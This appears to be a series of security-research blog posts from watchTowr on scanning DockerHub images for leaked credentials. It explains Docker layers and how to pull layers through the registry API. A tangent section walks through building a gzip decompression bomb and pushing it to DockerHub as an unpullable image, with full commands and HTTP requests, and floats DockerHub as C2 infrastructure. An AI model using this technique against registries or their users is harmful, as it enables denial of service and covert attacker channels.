Perhaps surprisingly, the overhead of the Python runtime itself is quite small. One notable performance optimisation we did find necessary, however, is to shell out to the underlying OS's gzip command in order to decompress files, which we observed to be roughly twice the speed of Python's implementation.
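A sketch of that shell-out, with a stdlib fallback in case the external binary isn't available:

```python
import gzip
import subprocess

# Sketch of the shell-out decompression we found faster than Python's gzip
# module. Falls back to the stdlib if the gzip binary is missing or fails.
def decompress(gz_bytes):
    try:
        proc = subprocess.run(["gzip", "-dc"], input=gz_bytes,
                              capture_output=True, check=True)
        return proc.stdout
    except (OSError, subprocess.CalledProcessError):
        return gzip.decompress(gz_bytes)
```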

One other area in which Python showed weakness is the matching of regular expressions. Initially, we matched each filename before scanning each file, so that we could skip files we weren't interested in. However, this was unusably slow - we quickly found that it was much faster to simply scan every file, and only check whether the result was interesting via a filename check after doing so. This cut down the number of regex queries significantly. Perhaps a subsequent project could use a compiled language such as golang instead of Python.

It should also be noted that the design of the regular expressions themselves is important (perhaps no surprise to those that regularly write regular expressions in high-traffic environments). We wrote some test code to benchmark our regular expressions and quickly found two which took around ten times longer to process than others - I had inadvertently left them unrooted.

By this, I mean that there was no 'anchor' at the end nor start of the expression. For example, the following would be very slow:

.*secret.*

while the following would be blazingly fast

.*secret$

The reason for this is obvious in retrospect - the second regex must check six bytes at the end of an input text, while the first must check for the presence of six bytes at any location in the input text.
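A sketch of the kind of benchmark harness we mean - the patterns and input here are illustrative, and absolute timings will vary by machine, so the point is to eyeball anything an order of magnitude slower than its peers:

```python
import re
import timeit

# Sketch of a regex benchmark harness. Feed it your real rules and a
# representative sample, then look for outliers rather than absolute numbers.
def benchmark(patterns, sample, number=200):
    compiled = {p: re.compile(p) for p in patterns}
    return {p: timeit.timeit(lambda r=r: r.search(sample), number=number)
            for p, r in compiled.items()}

# Illustrative run: the unrooted and anchored variants discussed above,
# against a long input containing no match.
timings = benchmark([r".*secret.*", r".*secret$"], "A" * 50_000)
```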

Conclusions

We've gone into detail on the topic of system design, outlined major pitfalls, and presented our workarounds. I hope this is useful for anyone wishing to replicate and/or extend our research! We'd love to hear about any projects you undertake inspired by (or related to) our research here.

Our system design allows us to ingest and examine files at a blazingly fast speed, scaling reasonably across multiple worker nodes. Now that we can do this, only the final piece of the puzzle remains - how to identify and extract secrets, such as passwords and keys, from the dataset. We'll talk about this in our post next week, and also go into detail on some of our findings, such as where exactly we found credentials (sometimes in unexpected places, sometimes not) and dig deeper into the types of credentials we found, which were wide-ranging (and mildly terrifying - spoiler, yes we did search for wallet.dat, and yes we did find results). See you then!

At watchTowr, we believe continuous security testing is the future, enabling the rapid identification of holistic high-impact vulnerabilities that affect your organisation.

If you'd like to learn more about the watchTowr Platform, our Continuous Automated Red Teaming and Attack Surface Management solution, please get in touch.

Layer Cake: How Docker Handles Filesystem Access - Docker Container Images (2/4)

9 February 2023 at 04:49

This post is the second part of a series on our recent adventures in DockerHub. Before you read it, you may want to check out the other posts of this series:


Those who read the previous post, in which we speak of our bulk downloading of 32 million files spread over 22,000 Docker images, may be wondering how exactly we managed to acquire and process such a volume of data. This post will go into one vital component in this task - efficiently acquiring these files from DockerHub.

For those who have not yet read the previous instalment, a brief recap:

watchTowr has a very simple core mission - to help our clients understand how they could be compromised today. After noting how frequently we discover potential compromises caused by critical secrets lurking inside publicly-available Docker images, we decided to carry out a more thorough study to assess the scale of this kind of credential leakage. In order to do so at the kind of scale that makes it truly useful, we built a system capable of efficiently acquiring files from DockerHub, and examining the contents in order to locate and extract sensitive data, such as API keys or private certificates.

While the acquisition of these files appears to be a simple topic ("just download them from DockerHub"), the process is more complex at scale than meets the eye, requiring an understanding of Docker's internal filesystem management before our system was able to perform at the kind of scale that watchTowr typically enjoys. This post explains how we managed to fetch and process such a quantity of data, enabling us to draw statistically reliable conclusions from our dataset.

The naΓ―ve approach

A naΓ―ve reader might be imagining a system which would simply execute the docker pull command, which fetches a Docker image from DockerHub, in order to download images. Indeed, our prototype implementation did just this. However, we very quickly found that this simple approach was not well-suited for the acquisition of filesystem data at the scale that we intended.

Firstly, this approach rapidly exhausted disk space, as it left each of the Docker images we processed (remember, we processed over 22,000 in total) on the system's hard drive. We were thus forced to periodically clear out the Docker cache via the docker system prune command, and unfortunately this led to major wastage of bandwidth and processor time.

To illustrate this wastage, consider a Docker image that is based upon Ubuntu Xenial. For example:

FROM ubuntu:xenial
RUN useradd watchtowr

Downloading this image via docker pull would result in Docker downloading both the final image itself, with the watchtowr user added, and the 'base' image containing Ubuntu Xenial. While this base layer would be cached by Docker, we would be forced to prune this cache periodically to keep disk space at a reasonable level. This means that, after clearing this cache, any subsequent fetch of an image based on Ubuntu Xenial would result in the Ubuntu Xenial image being downloaded and processed a second time. Since the Ubuntu image is large, this results in time and bandwidth waste, and since it contains many files, considerable time is wasted as we iterate and catalogue its contents. This prevents us from operating at scale.

Ingesting a Docker container would be much more efficient if we could ingest the files in the base image only once for all Ubuntu Xenial-based images, and only ingest the files which were altered by subsequent uses of this base image. Fortunately, Docker gives us the ability to do this.

Layers and their mountpoints

As you may be aware, the FROM directive in a Dockerfile instructs Docker to build a container based on a different container - for example, a build of your favourite Linux distribution, a configured webserver, or almost anything else. This is a good example of what Docker terms a "layer" - the 'base' image specified by the FROM directive is downloaded and stored, and changes made to it are stored in a separate 'delta' file. The underlying base image is not itself altered.

This concept extends past the FROM directive into the other statements in a Dockerfile. If you've used Docker in anything more than the most casual of settings, you may have noticed that your edits to the Dockerfile are usually applied quickly, without the entire container needing to be rebuilt. This is because Docker is good at keeping the output of each step cached as a 'layer' and re-using these layers to make the development process quicker.

It's easier to demonstrate this than it is to explain, so I'll take you through a simple example. We'll work from the following simple Dockerfile:

FROM ubuntu:latest
RUN useradd watchtowr

And go ahead and build it. We'll supply the argument --rm=false to explicitly keep intermediate layers, so that we can see what's going on more plainly.

$ docker build -t test --rm=false .
Sending build context to Docker daemon  2.048kB
Step 1/2 : FROM ubuntu:latest
latest: Pulling from library/ubuntu
2b55860d4c66: Pull complete
Digest: sha256:20fa2d7bb4de7723f542be5923b06c4d704370f0390e4ae9e1c833c8785644c1
Status: Downloaded newer image for ubuntu:latest
 ---> 2dc39ba059dc
Step 2/2 : RUN useradd watchtowr
 ---> Running in 4a1343b30818
 ---> 2d9c8f99458b
Successfully built 2d9c8f99458b
Successfully tagged test:latest

The hex strings represent intermediate containers and image layers. We can use the docker inspect command to find information about the newly-created container, including information about its file layers.

$ docker inspect test:latest
[
    {
        "Id": "sha256:2d9c8f99458bda0382bb8584707197cca58d6d061a28661b3decbe5f26c7a47d",
        "Parent": "sha256:2dc39ba059dcd42ade30aae30147b5692777ba9ff0779a62ad93a74de02e3e1f",
        "GraphDriver": {
            "Data": {
                "LowerDir": "/var/lib/docker/overlay2/af592f4c9c6219860c55265b4398d880b72b78a8891eabb863c29d0cf15f9d91/diff",
                "MergedDir": "/var/lib/docker/overlay2/0727186c05dce187b7c25c7f26ad929d037579d7c672e80846388436ddcb9d57/merged",
                "UpperDir": "/var/lib/docker/overlay2/0727186c05dce187b7c25c7f26ad929d037579d7c672e80846388436ddcb9d57/diff",
                "WorkDir": "/var/lib/docker/overlay2/0727186c05dce187b7c25c7f26ad929d037579d7c672e80846388436ddcb9d57/work"
            },
            "Name": "overlay2"
        }
    }
]

I've removed a lot of unimportant information from this, so we can focus on what we're really interested in, which is the mounted filesystem. Take a look at the path specified by UpperDir, and you'll see the contents of the image's filesystem:

$ find /var/lib/docker/overlay2/0727186c05dce187b7c25c7f26ad929d037579d7c672e80846388436ddcb9d57/diff -type f 
/var/lib/docker/overlay2/0727186c05dce187b7c25c7f26ad929d037579d7c672e80846388436ddcb9d57/diff/etc/shadow
/var/lib/docker/overlay2/0727186c05dce187b7c25c7f26ad929d037579d7c672e80846388436ddcb9d57/diff/etc/passwd-
/var/lib/docker/overlay2/0727186c05dce187b7c25c7f26ad929d037579d7c672e80846388436ddcb9d57/diff/etc/.pwd.lock
/var/lib/docker/overlay2/0727186c05dce187b7c25c7f26ad929d037579d7c672e80846388436ddcb9d57/diff/etc/gshadow-
/var/lib/docker/overlay2/0727186c05dce187b7c25c7f26ad929d037579d7c672e80846388436ddcb9d57/diff/etc/subuid
/var/lib/docker/overlay2/0727186c05dce187b7c25c7f26ad929d037579d7c672e80846388436ddcb9d57/diff/etc/group-
/var/lib/docker/overlay2/0727186c05dce187b7c25c7f26ad929d037579d7c672e80846388436ddcb9d57/diff/etc/gshadow
/var/lib/docker/overlay2/0727186c05dce187b7c25c7f26ad929d037579d7c672e80846388436ddcb9d57/diff/etc/shadow-
/var/lib/docker/overlay2/0727186c05dce187b7c25c7f26ad929d037579d7c672e80846388436ddcb9d57/diff/etc/subgid-
/var/lib/docker/overlay2/0727186c05dce187b7c25c7f26ad929d037579d7c672e80846388436ddcb9d57/diff/etc/passwd
/var/lib/docker/overlay2/0727186c05dce187b7c25c7f26ad929d037579d7c672e80846388436ddcb9d57/diff/etc/group
/var/lib/docker/overlay2/0727186c05dce187b7c25c7f26ad929d037579d7c672e80846388436ddcb9d57/diff/etc/subgid
/var/lib/docker/overlay2/0727186c05dce187b7c25c7f26ad929d037579d7c672e80846388436ddcb9d57/diff/etc/subuid-
/var/lib/docker/overlay2/0727186c05dce187b7c25c7f26ad929d037579d7c672e80846388436ddcb9d57/diff/var/log/lastlog
/var/lib/docker/overlay2/0727186c05dce187b7c25c7f26ad929d037579d7c672e80846388436ddcb9d57/diff/var/log/faillog

Here we can see all the changes made by the final command in the Dockerfile - in our case, a useradd watchtowr command, which can be audited, examined, or logged independently of other commands or the base filesystem image.

While this may seem like an interesting but mostly-useless implementation detail, it is actually very useful to us in our quest to efficiently archive a large number of containers. This is the mechanism that allows us to process each layer individually, allowing us to re-use the result of previous examinations. Given two unrelated containers that rely on, for example, an Ubuntu base system, we can ingest the Ubuntu base only once, and ingest the changes made by each of the two containers in isolation.
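A sketch of that layer-level dedup, with ingest_layer as a hypothetical stand-in for the real fetch-and-catalogue step:

```python
# Sketch of layer-level dedup: given each image's list of layer digests,
# only digests we have not seen before need to be fetched and ingested.
# ingest_layer is a hypothetical stand-in for the real fetch-and-catalogue step.
def ingest_images(images, ingest_layer):
    seen = set()
    fetched = 0
    for image, layer_digests in images.items():
        for digest in layer_digests:
            if digest in seen:
                continue  # base layer shared with an earlier image - skip
            seen.add(digest)
            ingest_layer(digest)
            fetched += 1
    return fetched
```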

DockerHub and pulling images

Given our newfound knowledge of Docker layers, it is our next task to determine how to acquire these layers in isolation. Typically, if a user wishes to use an image located on DockerHub, they will either pull it explicitly using the docker pull command or simply specify it in their Dockerfile using the FROM statement. Let's look more closely, and examine the Ubuntu xenial image. If we pay attention to a 'pull' of the image via the docker pull command, we can see that four layers are fetched:

$ docker pull ubuntu:xenial
xenial: Pulling from library/ubuntu
58690f9b18fc: Pull complete
b51569e7c507: Pull complete
da8ef40b9eca: Pull complete
fb15d46c38dc: Pull complete
Digest: sha256:91bd29a464fdabfcf44e29e1f2a5f213c6dfa750b6290e40dd6998ac79da3c41
Status: Downloaded newer image for ubuntu:xenial
docker.io/library/ubuntu:xenial

We can interrogate Docker to find information about the underlying layers using docker inspect, but we can also query the DockerHub server directly. We'll take the latter approach for our demonstration, as it will enable us to fetch layers ourselves without needing to call the docker command at all.

Our first step, given our repository name, repository owner, and tag name, is to fetch the manifest from the registry. This is a JSON file which stores metadata about the image, such as its name, architecture, and (importantly for us) filesystem layers.

It's our experience that the DockerHub API can be quite exacting in its requirements, presumably due to backward-compatibility constraints from previous clients. If you're following along, be sure to include the HTTP headers shown, otherwise you may get unexpected results.

In order to fetch the manifest, the DockerHub API first requires that we log in (anonymously). We'll do that with curl, which should give us an access token. Note that we must specify the repository owner and name when obtaining a session:

$ curl  "https://auth.docker.io/token?service=registry.docker.io&scope=repository:library/ubuntu:pull"
{"token":"eyJhbGci<snip>gDHzIqA","access_token":"eyJhbGci<snip>gDHzIqA","expires_in":300,"issued_at":"2022-09-22T14:08:55.923752639Z"}

We're interested in the value of the 'token' field, since that's what we need to present to the DockerHub API. With this, we can fetch the manifest for the repo we're after:

$ curl --header "Authorization: Bearer eyJhbGci<snip>gDHzIqA" "https://registry-1.docker.io/v2/library/ubuntu/manifests/xenial"
{
   "schemaVersion": 1,
   "name": "library/ubuntu",
   "tag": "xenial",
   "architecture": "amd64",
   "fsLayers": [
      {
         "blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"
      },
      {
         "blobSum": "sha256:fb15d46c38dcd1ea0b1990006c3366ecd10c79d374f341687eb2cb23a2c8672e"
      },
      {
         "blobSum": "sha256:da8ef40b9ecabc2679fe2419957220c0272a965c5cf7e0269fa1aeeb8c56f2e1"
      },
      {
         "blobSum": "sha256:b51569e7c50720acf6860327847fe342a1afbe148d24c529fb81df105e3eed01"
      },
      {
         "blobSum": "sha256:58690f9b18fca6469a14da4e212c96849469f9b1be6661d2342a4bf01774aa50"
      }
   ]
   <snip>
}

Great, so we find that the image is built from five layers, and we have the hash of each! We can fetch the layers themselves straight from the DockerHub API (it'll give us an HTTP redirect, so make sure you specify --location to follow it):

$ curl --location --header "Authorization: Bearer eyJhbGci<snip>gDHzIqA" 
https://registry-1.docker.io/v2/library/ubuntu/blobs/sha256:fb15d46c38dcd1ea0b1990006c3366ecd10c79d374f341687eb2cb23a2c8672e -o layer

The file we've fetched is a simple gzip'ed tarfile.

$ file layer
layer: gzip compressed data, truncated
$ tar -zvxf layer
drwxr-xr-x 0/0               0 2021-08-05 03:01 run/
drwxr-xr-x 0/0               0 2021-08-31 09:21 run/systemd/
-rw-r--r-- 0/0               7 2021-08-31 09:21 run/systemd/container

Neat. The other layers contain the bulk of the filesystem entries:

$ curl --location --header "Authorization: Bearer eyJhbGci<snip>gDHzIqA"
https://registry-1.docker.io/v2/library/ubuntu/blobs/sha256:58690f9b18fca6469a14da4e212c96849469f9b1be6661d2342a4bf01774aa50 -o layer
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:--  0:00:01 --:--:--     0
100 44.3M  100 44.3M    0     0  22.3M      0  0:00:01  0:00:01 --:--:-- 62.6M
$ tar -zvtf layer |head
drwxr-xr-x 0/0               0 2021-08-05 03:01 bin/
-rwxr-xr-x 0/0         1037528 2019-07-13 03:26 bin/bash
-rwxr-xr-x 0/0           52080 2017-03-03 02:07 bin/cat
-rwxr-xr-x 0/0           60272 2017-03-03 02:07 bin/chgrp
-rwxr-xr-x 0/0           56112 2017-03-03 02:07 bin/chmod
-rwxr-xr-x 0/0           64368 2017-03-03 02:07 bin/chown
-rwxr-xr-x 0/0          151024 2017-03-03 02:07 bin/cp
-rwxr-xr-x 0/0          154072 2016-02-18 04:25 bin/dash
-rwxr-xr-x 0/0           68464 2017-03-03 02:07 bin/date
-rwxr-xr-x 0/0           72632 2017-03-03 02:07 bin/dd

If we browse with a web browser to view the Dockerfile that was used to create the image, we can correlate the steps - we notice that the final command in the Dockerfile is /bin/sh -c mkdir -p /run/systemd, which corresponds to the first layer we pulled down.

GZBombing

If I may take a brief step away from our larger objective here and explore something of a tangent, our research made us rather curious about the scope for abusing DockerHub for nefarious purposes. Specifically, the architecture of this system itself - a large 'blob store' - piqued my interest.

One of my first considerations was: "is it possible to upload a 'GZip bomb' - a file which decompresses to an impractically large output - to DockerHub?" This would have little real-world impact beyond creating a repository which was effectively "un-pull-able", but it is an interesting curiosity nonetheless.

Since gzip's maximum compression ratio is 1032:1 (see here), we will start off by compressing 1TB of zeros, producing a file roughly 1GB in size.

$ dd if=/dev/zero bs=1024 count=$((1024*1024*1024)) status=progress | gzip > tmp.gz

Docker, of course, won't let us push such large objects, and so we are forced to perform the upload process itself. We must, then, upload this file to DockerHub, and finally, create a manifest which references it as if it were a filesystem layer, so that it will be downloaded by the client when an image is pulled via the usual docker pull.

Uploading a file to DockerHub's "blob store" is straightforward, although not a single-step process. First, we must authenticate (this time with a real account on DockerHub.com). Note the access we supply is, this time, push,pull rather than pull as before. Here, I'm authenticating as my account, alizwatchtowr, and preparing to push to the foo repository.

$ curl -u alizwatchtowr:<my password> "https://auth.docker.io/token?account=alizwatchtowr&service=registry.docker.io&scope=repository:alizwatchtowr/foo:push,pull"
{"token":"..", ...}

We get a token as before. Our next step is to do a POST of length zero to the /v2/alizwatchtowr/foo/blobs/uploads/ endpoint, which will elicit a response containing a redirect via the location header. I'm going to switch to showing the raw HTTP request and response data here, rather than cURL commands.

POST /v2/alizwatchtowr/foo/blobs/uploads/ HTTP/1.1
Host: registry-1.docker.io
Content-Length: 0
Authorization: Bearer <token>

As expected, our response contains a location header.

HTTP/1.1 202 Accepted
content-length: 0
docker-distribution-api-version: registry/2.0
docker-upload-uuid: d907ce6b-c800-47a8-b7f3-c13147acd9a6
location: https://registry-1.docker.io/v2/alizwatchtowr/foo/blobs/uploads/d907ce6b-c800-47a8-b7f3-c13147acd9a6?_state=7hAcy4hFGe8sGNMae3jr9RIIuUD77OtskTElHOgT4Y57Ik5hbWUiOiJhbGl6d2F0Y2h0b3dyL2ZvbyIsIlVVSUQiOiJkOTA3Y2U2Yi1jODAwLTQ3YTgtYjdmMy1jMTMxNDdhY2Q5YTYiLCJPZmZzZXQiOjAsIlN0YXJ0ZWRBdCI6IjIwMjItMDktMjVUMTc6NTE6MTYuOTg3NDkzNzc5WiJ9
range: 0-0
date: Sun, 25 Sep 2022 17:51:17 GMT
strict-transport-security: max-age=31536000
connection: close

We must then issue a HTTP PATCH verb to the location specified by this header, with our data as the payload.

PATCH /v2/alizwatchtowr/foo/blobs/uploads/d907ce6b-c800-47a8-b7f3-c13147acd9a6?_state=7hAcy4hFGe8sGNMae3jr9RIIuUD77OtskTElHOgT4Y57Ik5hbWUiOiJhbGl6d2F0Y2h0b3dyL2ZvbyIsIlVVSUQiOiJkOTA3Y2U2Yi1jODAwLTQ3YTgtYjdmMy1jMTMxNDdhY2Q5YTYiLCJPZmZzZXQiOjAsIlN0YXJ0ZWRBdCI6IjIwMjItMDktMjVUMTc6NTE6MTYuOTg3NDkzNzc5WiJ9 HTTP/1.1
Host: registry-1.docker.io
Authorization: Bearer <token>
Content-Length: <size of tmp.gz>

<raw data from tmp.gz>

The server responds with an HTTP 202 Accepted, but our work is not yet over.

HTTP/1.1 202 Accepted
content-length: 0
docker-distribution-api-version: registry/2.0
docker-upload-uuid: d907ce6b-c800-47a8-b7f3-c13147acd9a6
location: https://registry-1.docker.io/v2/alizwatchtowr/foo/blobs/uploads/d907ce6b-c800-47a8-b7f3-c13147acd9a6?_state=KhwcMVoX_Mtz8IeXtz2NCwSQoIeolZhFoD7-vZK6iYx7Ik5hbWUiOiJhbGl6d2F0Y2h0b3dyL2ZvbyIsIlVVSUQiOiJkOTA3Y2U2Yi1jODAwLTQ3YTgtYjdmMy1jMTMxNDdhY2Q5YTYiLCJPZmZzZXQiOjE4MjUsIlN0YXJ0ZWRBdCI6IjIwMjItMDktMjVUMTc6NTE6MTZaIn0%3D
range: 0-<size of tmp.gz>
date: Sun, 25 Sep 2022 17:51:22 GMT
strict-transport-security: max-age=31536000
connection: close

We must also perform an HTTP PUT to the URL in the location header, specifying the hash that we expect. We calculate the hash first:

$ pv tmp.gz |sha256sum
1017MiB 0:00:04 [ 227MiB/s] [================================>] 100%
9358dad6bc6da9103d5c127dc2e88cbcf3dd855d8a48e3e7b7e1de282f87a27f  -

Now we append this to the location, as an extra query string parameter named 'digest'. It is in the usual Docker format, hex bytes prefixed with the literal string sha256:.

PUT /v2/alizwatchtowr/foo/blobs/uploads/d907ce6b-c800-47a8-b7f3-c13147acd9a6?_state=KhwcMVoX_Mtz8IeXtz2NCwSQoIeolZhFoD7-vZK6iYx7Ik5hbWUiOiJhbGl6d2F0Y2h0b3dyL2ZvbyIsIlVVSUQiOiJkOTA3Y2U2Yi1jODAwLTQ3YTgtYjdmMy1jMTMxNDdhY2Q5YTYiLCJPZmZzZXQiOjE4MjUsIlN0YXJ0ZWRBdCI6IjIwMjItMDktMjVUMTc6NTE6MTZaIn0%3D&digest=sha256%3A9358dad6bc6da9103d5c127dc2e88cbcf3dd855d8a48e3e7b7e1de282f87a27f HTTP/1.1
Host: registry-1.docker.io
Content-Length: 0
Authorization: Bearer <token>

Finally, we see a HTTP 201 Created, and our work is done:

HTTP/1.1 201 Created
content-length: 0
docker-content-digest: sha256:1be66495afef80008912c98adc4db8bb6816376f8da430fae68779e0459566a2
docker-distribution-api-version: registry/2.0
location: https://registry-1.docker.io/v2/alizwatchtowr/foo/blobs/sha256:9358dad6bc6da9103d5c127dc2e88cbcf3dd855d8a48e3e7b7e1de282f87a27f
date: Sun, 25 Sep 2022 17:51:29 GMT
strict-transport-security: max-age=31536000
connection: close
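The three raw HTTP steps above (POST, PATCH, PUT) consolidate naturally into one function. Here's a sketch using a requests-style session; upload_blob and its parameters are our names for illustration, not an official API, and error handling is elided:

```python
import hashlib
from urllib.parse import quote

# Sketch of the blob upload flow: open an upload session (POST), send the
# bytes (PATCH), then finalise with the expected digest (PUT). `session` is
# anything with requests-style post/patch/put methods.
def upload_blob(session, registry, repo, data, token):
    headers = {"Authorization": f"Bearer {token}"}
    # Step 1: the Location header tells us where to send the data.
    r = session.post(f"{registry}/v2/{repo}/blobs/uploads/", headers=headers)
    location = r.headers["location"]
    # Step 2: PATCH the raw bytes to the upload location.
    r = session.patch(location, data=data, headers=headers)
    location = r.headers["location"]
    # Step 3: finalise with a PUT carrying the sha256 digest as a query param.
    digest = "sha256:" + hashlib.sha256(data).hexdigest()
    sep = "&" if "?" in location else "?"
    r = session.put(f"{location}{sep}digest={quote(digest, safe='')}",
                    headers=headers)
    return digest, r.status_code
```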

We can verify that the resource has indeed been created by fetching it, although we must log in first. This is easily done via cURL:

$ curl  "https://auth.docker.io/token?service=registry.docker.io&scope=repository:alizwatchtowr/foo:pull"
{"token":"..", ...}
$ curl --location --header "Authorization: Bearer eyJhbGci<snip>gDHzIqA" https://registry-1.docker.io/v2/alizwatchtowr/foo/blobs/sha256:9358dad6bc6da9103d5c127dc2e88cbcf3dd855d8a48e3e7b7e1de282f87a27f -o uploaded.gz

At this stage, however, there is no DockerHub repository which references the file. In order to reference the file, we must modify the manifest of a tag to specify our new file by hash. This is easiest if we work from an existing repository, so I built a simple 'hello world' style repository, built it, and issued a docker inspect command to view its manifest. As you may recall from above, this manifest lists (among other things) the hash of filesystem images. We will simply alter this, changing one to the sha256 hash of the image we uploaded previously.

"diff_ids":[
    "sha256:7f5cbd8cc787c8d628630756bcc7240e6c96b876c2882e6fc980a8b60cdfa274",
    "sha256:9358dad6bc6da9103d5c127dc2e88cbcf3dd855d8a48e3e7b7e1de282f87a27f"
]

Note the final layer's hash.
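The edit itself is trivial - parse the image config, replace the final diff_id, and re-serialise. A sketch (the field layout follows the structure shown above; the digest values here are placeholders, not the real hashes):

```python
import json

# Illustrative image config - the digests are placeholders, not real hashes
config = {
    "rootfs": {
        "type": "layers",
        "diff_ids": [
            "sha256:<base-layer-digest>",
            "sha256:<original-final-layer-digest>",
        ],
    }
}

# Swap the final layer for the blob we uploaded earlier
our_digest = "sha256:<digest-of-our-uploaded-blob>"
config["rootfs"]["diff_ids"][-1] = our_digest

new_config = json.dumps(config, indent=3)
```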

We can upload this file to the 'blob store' as before, which yields the hash of the manifest itself (in our case, fee9926cf943231119d363b65042138890ca9ad6299a75e6061aa97dade398d0). But DockerHub still won't recognise it as a manifest - we must perform one final step, which is a simple PUT to /v2/alizwatchtowr/foo/manifests/latest. This request uploads a manifest list, which specifies the hash of the manifest itself. It looks like this:

{
   "schemaVersion": 2,
   "mediaType": "application/vnd.docker.distribution.manifest.v2+json",
   "config": {
      "mediaType": "application/vnd.docker.container.image.v1+json",
      "size": 1619,
      "digest": "sha256:1834ec0829375e72a44940b8f084cd02991736281d012396e1dc32ce9ea36e8d"
   },
   "layers": [
      {
         "mediaType": "application/vnd.docker.image.rootfs.diff.tar.gzip",
         "size": 30426706,
         "digest": "sha256:2b55860d4c667a7200a0cb279aec26777df61e5d3530388f223ce7859d566e7a"
      },
      {
         "mediaType": "application/vnd.docker.image.rootfs.diff.tar.gzip",
         "size": 1825,
         "digest": "sha256:1be66495afef80008912c98adc4db8bb6816376f8da430fae68779e0459566a2"
      }
   ]
}

We change the config digest to that of our manifest, and send the result via an HTTP PUT.

{
   "schemaVersion": 2,
   "mediaType": "application/vnd.docker.distribution.manifest.v2+json",
   "config": {
      "mediaType": "application/vnd.docker.container.image.v1+json",
      "size": 1619,
      "digest": "sha256:fee9926cf943231119d363b65042138890ca9ad6299a75e6061aa97dade398d0"
   },
   "layers": [
      {
         "mediaType": "application/vnd.docker.image.rootfs.diff.tar.gzip",
         "size": 30426706,
         "digest": "sha256:2b55860d4c667a7200a0cb279aec26777df61e5d3530388f223ce7859d566e7a"
      },
      {
         "mediaType": "application/vnd.docker.image.rootfs.diff.tar.gzip",
         "size": 1825,
         "digest": "sha256:1be66495afef80008912c98adc4db8bb6816376f8da430fae68779e0459566a2"
      }
   ]
}

Finally, our image is uploaded to DockerHub! Browsing to it shows the hash of the manifest list, and nothing seems to be awry:

[Image: the repository page on DockerHub, showing the manifest list hash]

But when we try to pull it, we are met with unusably slow decompression of 1TB of data. We have successfully pushed an object so large it cannot be pulled.

[Image: docker pull stalling while extracting the oversized layer]
Could God himself create an object so large that He Himself couldn't lift it?

We could, if this was not enough, add more layers or add even larger payload data.
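For the curious, producing such a pathological layer is trivial - gzip compresses long runs of identical bytes at ratios of roughly 1000:1, so a modest upload can decompress to something enormous. A scaled-down sketch:

```python
import gzip
import io

# 16 MiB of zeros - gzip squeezes this down to roughly 16 KiB (~1000:1)
RAW_SIZE = 16 * 1024 * 1024

buf = io.BytesIO()
with gzip.GzipFile(fileobj=buf, mode="wb") as f:
    f.write(b"\x00" * RAW_SIZE)
bomb = buf.getvalue()

ratio = RAW_SIZE // len(bomb)
```

Scale `RAW_SIZE` up and the compressed blob stays comfortably uploadable while the decompressed size becomes unmanageable.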

Since the API requires that we authenticate, the scope for HTTP-based shenanigans such as XSS is reduced to almost zero. Storing arbitrary objects in a blob store can itself hardly be called a vulnerability (although it may be useful to some attackers).

Bringing it all together

In this post, we've scrutinised Docker's concept of layered filesystems, learning how we can enumerate the layers associated with an image, and how to fetch them individually from DockerHub, without their dependencies. Given our new understanding, it is now possible for us to write an efficient file indexer for Docker images, fetching only layers we have not yet indexed, and ingesting only files we have not encountered before. This ability enables us to ingest the files contained within a Docker image without needing to shell out to the docker command at all.
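The indexing strategy described above can be sketched in a few lines - keep a set of layer digests we have already ingested, and fetch only those we haven't seen (manifest layout as shown earlier in this post):

```python
# Digests of layers we have already fetched and indexed
seen_layers: set[str] = set()

def layers_to_fetch(manifest: dict) -> list[str]:
    """Return only the layer digests we have not yet ingested."""
    new_digests = []
    for layer in manifest["layers"]:
        digest = layer["digest"]
        if digest not in seen_layers:
            seen_layers.add(digest)
            new_digests.append(digest)
    return new_digests

# Two images sharing a base layer: the base is fetched only once
image_a = {"layers": [{"digest": "sha256:base"}, {"digest": "sha256:app-a"}]}
image_b = {"layers": [{"digest": "sha256:base"}, {"digest": "sha256:app-b"}]}
```

Because layers are content-addressed, the digest alone is enough to decide whether we've seen one before - no need to download it first.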

While this comprehension may seem academic at first glance, it is actually a crucial part of the system we are designing in this series. As mentioned above, initial prototyping of this system would fetch containers simply by repeatedly executing docker pull, which would pull all of the layers referenced by the given container. Since these would be written to disk, a periodic prune was necessary to remove them. However, this often meant that base layers were fetched repeatedly, leading to unacceptably poor performance and network load - preventing us from processing data at the scale we aspire to.

This new approach, however, enables us to process Docker layers individually, building up our view of containers in a much more structured way, with no duplication. With the significant boost in efficiency that this brings, we are able to fetch substantially more files from DockerHub, and thus build up a much more realistic view of the broader container landscape, ultimately resulting in more statistically reliable output.

We also took a brief jaunt into the file upload process, figuring out how to upload filesystem layers to DockerHub, and how to modify manifests, culminating in a gzip bomb, which (while useless) is an interesting curiosity. One wonders how effective a C2 network built upon DockerHub objects would be, since very few organisations would scrutinize this traffic.

Next week, we'll put our newfound knowledge about Docker's layered filesystem into practical use, discussing how we built a system capable of archiving, indexing, and examining such a large quantity of data for those all-important secrets. We'll outline general design and then delve into detail on specific topics, outlining difficulties we faced and sharing performance statistics. I hope you'll join us!

Examining this kind of 'hidden' attack surface is exactly what we do here at watchTowr. We believe continuous security testing is the future, enabling the rapid identification of holistic high-impact vulnerabilities that affect your organisation.

If you'd like to learn more about the watchTowr Platform, our Continuous Automated Red Teaming and Attack Surface Management solution, please get in touch.

"I don't need no zero-dayz" - Docker Container Images (1/4)

3 February 2023 at 08:25
"I don't need no zero-dayz" - Docker Container Images  (1/4)


This post is the first part of a series on our recent adventures into DockerHub - you may be interested in the subsequent instalments.

Here at watchTowr, we love delving into 'forgotten' attack surfaces - resources that are exposed to the public, forgotten about, and give us all the information we need to gain initial access to an organisation.

The more dark corners of an attack surface that we can see, the more we fulfil our ultimate goal - helping our clients understand how they could be compromised today.

Today, I'd like to share some research that we recently undertook in order to assess the scale of one such oft-neglected attack surface - that is exposed by public Docker container images.

Through the watchTowr Platform's analysis of attack surfaces, we frequently discover sensitive data in Docker container images. In order to more formally assess the scale of this problem, and also to raise awareness of the associated veiled attack surface, we decided to embark on a research project searching a representative portion of available DockerHub images for sensitive information. Our expectation at this point was that we would discover access keys for small-scale applications, but we soon found that even large organisations were not without weaknesses in this area.

In this post, the first of a four-part series, we will discuss an overview of our findings at a high level. Subsequent posts will explain our technical methodology in more detail, and offer additional insight into the problems we encountered during the research - as well as observations on the distribution of sensitive data and recommendations to those who wish to avoid their own inadvertent exposure.

What Are Docker Containers?

